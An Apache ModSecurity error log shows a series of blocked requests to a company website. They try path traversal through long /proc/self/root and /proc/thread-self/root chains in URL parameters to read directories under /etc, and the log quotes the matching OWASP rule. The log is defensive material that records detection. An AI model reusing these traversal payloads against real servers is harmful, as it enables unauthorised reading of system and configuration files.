[Mon Mar 16 14:10:11.659117 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:43310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5c46lpbStxTqkSkt0RAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:10:13.060441 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:40196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5daTCbgAP5jq5TegylQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:10:17.715271 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:40208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5edSswJuvopo3lOhm3AAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:10:19.115940 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.243.203:40216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5e6QpVkWug9HeOt89MgAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:10:23.731260 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:36990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5f5qj1wV0Si-Okef2owAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:10:37.122421 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:36996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5jXjZBu2q05ozVU9gywAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:10:52.644702 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:33846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5nKTCbgAP5jq5TegysAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:11:39.603387 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:53552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5y6TCbgAP5jq5Tegy2wAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:11:44.286482 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:45612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg50LysWC90G-1nBrBMrQAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:11:54.331408 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:45624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg52rysWC90G-1nBrBMuAAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:11:55.639593 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:51738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg52_9ocpUE4ed4uDz4CgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:12:14.847606 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.241.46:50012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg57pqj1wV0Si-Okef21gAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:16.412189 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:36014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg58HjZBu2q05ozVU9g4QAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:17.648759 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:36020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg58bABkC4fWIHEf8H21wAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:19.010058 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:41340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg586QpVkWug9HeOt89RAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:22.351193 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:41350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg59o6lpbStxTqkSkt0hQAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:23.686511 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:41364] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg59_9ocpUE4ed4uDz4EQAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:24.495257 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:51752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5-FajLEzk2WiQ-10Z8QAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:12:25.038140 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.241.46:41376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5-aTCbgAP5jq5Tegy4AAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:26.205023 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:41388] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5-rysWC90G-1nBrBMuwAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:27.012337 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:56992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5-3jZBu2q05ozVU9g5AAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
